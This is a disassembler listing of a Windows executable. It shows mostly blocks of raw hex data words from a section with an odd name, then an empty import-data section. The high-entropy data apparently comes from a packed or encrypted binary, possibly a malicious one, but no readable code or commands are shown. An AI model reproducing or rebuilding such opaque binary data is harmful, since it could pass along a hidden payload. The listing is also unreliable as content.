dd 471CE078h, 85F3918Eh, 0B6FB4066h, 0B2CCB8C6h, 718D7C05h
dd 1BBF6599h, 5CB32E3h, 821D69DFh, 34ACF01Dh, 0C9AE5BCFh
dd 5E1B516h, 5C216DDh, 617DF73h, 0D09815FFh, 0D006A66Eh
dd 79480BCEh, 0F6F439DFh, 3EF91E2Bh, 6E7F9FB6h, 7B344DD7h
dd 1E450591h, 0B08F376h, 811E516Ch, 37155B9Bh, 1EB9ECA2h
dd 0D264733Eh, 0CF0BCA59h, 2263D780h, 0E0387C90h, 0A63F597h
dd 0FE157CA8h, 1F841E97h
dd 585178B0h, 0BD17D16Eh, 0EDF1232Eh, 470B05BFh, 0B105DBE2h
dd 0DFA179Dh, 3E7871BEh, 5A169F57h, 16EF0595h, 2001052Bh
dd 0F9D03A7Dh, 27200C45h, 0BC7F2023h, 0DB54240Dh, 0C42711EAh
dd 0EE57B7E3h, 3F206F6Fh, 0FDA235FBh, 7DCEE4ABh, 0B3DCAF6Fh
dd 5EDF05BFh, 0B10567B9h, 35FB2971h, 50440FEh, 0CAF67D11h
dd 452BFB3Dh, 40F23F29h, 116BA0B4h, 7ED96939h, 4B2EB66Eh
dd 1777B37Eh, 0DDF88106h, 0BDE9CD50h, 0F6052363h, 2340E51Fh
dd 0F41CBA9Fh, 0FB4B05D6h, 0CA05E87Fh, 8DFC1B82h, 0CBDD5E4h
dd 780AF921h, 7044A40Ah, 38EC0C24h, 9130670Ah, 82349E6Fh
dd 547B8F67h, 770A04FCh, 3D0FEC7Fh, 638705F6h, 3AF13D11h
dd 0BEB0DE3Bh, 63D0FE41h, 8C59354Fh
db 2Eh
byte_43FB3D db 48h, 0F6h, 0F9h ; DATA XREF: sub_401F1C+1B9�o
dd 0EC4C330Ah, 9C652246h, 0A9932281h, 3C6C0A63h, 0F2608CC3h
dd 0EC5433DAh, 5F362324h, 0C6222F0Ah, 0AC661B2h, 7ED51F24h
dd 0D9576423h, 0B4720AA9h, 0FF1BA423h, 3A2D1C0Ah, 2404F376h
dd 38C0ABC7h, 0D889ADCBh, 7694D3E0h, 0D114557h, 1E1DF0A0h
dd 0AB2F4AF5h, 0DB534F9Bh, 9E05B5DAh, 6BB4A6E5h, 694D3DFDh
dd 9F7C05D7h, 0E467642Fh, 0A5345497h, 0D0AB5DDBh, 0A04C7D24h
dd 25048EF9h, 8253D27h, 8B6BF915h, 555B7952h, 586ECADh
dd 0CC6F1C55h, 0A7CB127h, 469EE49Eh, 14B479F0h, 0A40AFD2Bh
dd 910C67CAh, 0C163F2h, 6E5E26B2h, 0AC1B0A24h, 0D1DCCD25h
dd 0D80B672Ah, 0D49C303Ch, 0D07336F2h, 0CCCF3CC9h, 3CC42742h
dd 0F46FC07Ch, 0B188FE7Dh, 0FB56101Bh, 54EB8C3h, 401C6486h
dd 0A31B36D3h, 9BB30426h, 3E870ABBh, 696D407Bh, 867D2748h
dd 0BF929D71h, 3AE30D05h, 0C5B10525h, 2D50BE22h, 0A00AC7E2h
dd 472D7612h, 0BA61912Ah, 64C70A13h, 6C9055D7h, 0E70BE8D8h
dd 0E7D89425h, 0BCFB782Ch, 4A287884h, 0BC9765Bh, 2D834B59h
dd 3661E0Bh, 8005DB66h, 0EF5F635Ah, 4A75807Eh, 5DF66BEh
dd 0CD7C94EBh, 2DE705EFh, 0E7289F52h, 0F39E262Eh, 9C0BCEF1h
dd 0BFB52FBh, 16F29839h, 23CC372Fh, 0CF0B1DD9h, 308C35F8h
dd 46306E88h, 0A13076C2h, 0B26AA035h, 6BE45F6Fh, 5D81B56h
dd 2AEE1C8Bh, 9FC1CCC5h, 32DC9330h, 7D3231B1h, 0A8DB579h
dd 93DFB64h, 68EF0A32h, 32A3D815h, 5034FBB8h, 7DAC3C6Ah
dd 0AE436ACDh, 0D59A05BEh, 355F5C86h, 12B90DABh, 0E832D868h
dd 6AA324C4h, 0AC807E48h, 54AE436h, 563484ACh, 0B1493A5Fh
dd 0A0BF9A35h, 7F355CB2h, 98968016h, 8EF4056Dh, 0E18E670Ah
dd 0C5FD2A05h, 6B2CF973h, 450C1836h, 0F00B9DB7h, 2293D3F6h
dd 0FE3C833h, 0BA27E337h, 0E80A7D3Ch, 520715E0h, 60C35DFAh
dd 0F680046Ah, 43D104B6h, 0A5029630h, 0E897D15Fh, 0A8D180Ah
dd 81FB75FDh, 0D0860EEh, 93A2BB2Fh, 17F4D98Eh, 11168B47h
dd 2C6E0BFh, 0EBC78BE9h, 2383C22Bh, 142897Fh, 0FF46068Ah
dd 83C8B60Fh, 0E9C103E0h, 0A5F302FEh, 0A4F3C88Bh, 0D00311EFh
dd 0E9FB07C6h, 0EA83D72Bh, 1577C21h, 0C12FC783h, 0FE5FC375h
dd 2B664D8Dh, 2DAAF3CFh, 41F3D0D4h, 0BA5664Bh, 0DC17005Fh
dd 0F37E1F29h, 1015F0BBh, 0F26B07EFh, 7CB5C3C1h, 0F63E4006h
dd 5482168Ah, 0FF651234h, 0A0EA8181h, 0FF333E95h, 32C03BF2h
dd 330CF2D3h, 131688FFh, 3346F3C6h, 4BF2DBCBh, 0F3FAF527h
dd 3BF3C92Bh, 0F2A2FBAAh, 0C875B72Ch, 69537F2Eh, 1A5080F7h
dd 0FE3BF785h, 37FD00BBh, 0EEB86923h, 70022F4h, 1402A3B7h
dd 568E108Ah, 27EF5EC8h, 33E980CEh, 2AF60BE8h, 0D7F6B825h
dd 1C0B88A9h, 43F23AF7h, 48A97015h, 0BE664B46h, 0F78BF2FBh
dd 5413CF75h, 1BC9F46Fh, 1BEC6DF2h, 0CCCF2741h, 835BF5F1h
dd 15266CEEh, 0FFEA16h, 0B51F76Bh, 190BF2DAh, 0D79FF09Ah
dd 81B1F39Ah, 0DB1E4808h, 6C5E3458h, 0A94C061Fh, 0BB5DEEEh
dd 6B52EAC2h, 1D82660Bh, 0EF1E0BDEh, 0F180290Eh, 48246F0Ah
dd 0D2FBF181h, 0F3ADEB1Eh, 7C476D45h, 0F803F2E5h, 56DA7F41h
dd 0F2DE5E2Bh, 56172848h, 0F7D0F200h, 0F64E5BD7h, 6BC075FDh
dd 19C32DFFh, 25C6ED37h, 23198839h, 8A140953h, 594FAh
dd 0
dd 0FF12h, 48h dup(0)
J8@F_7_S ends
; Section 6. (virtual address 00040000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00040000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 440000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start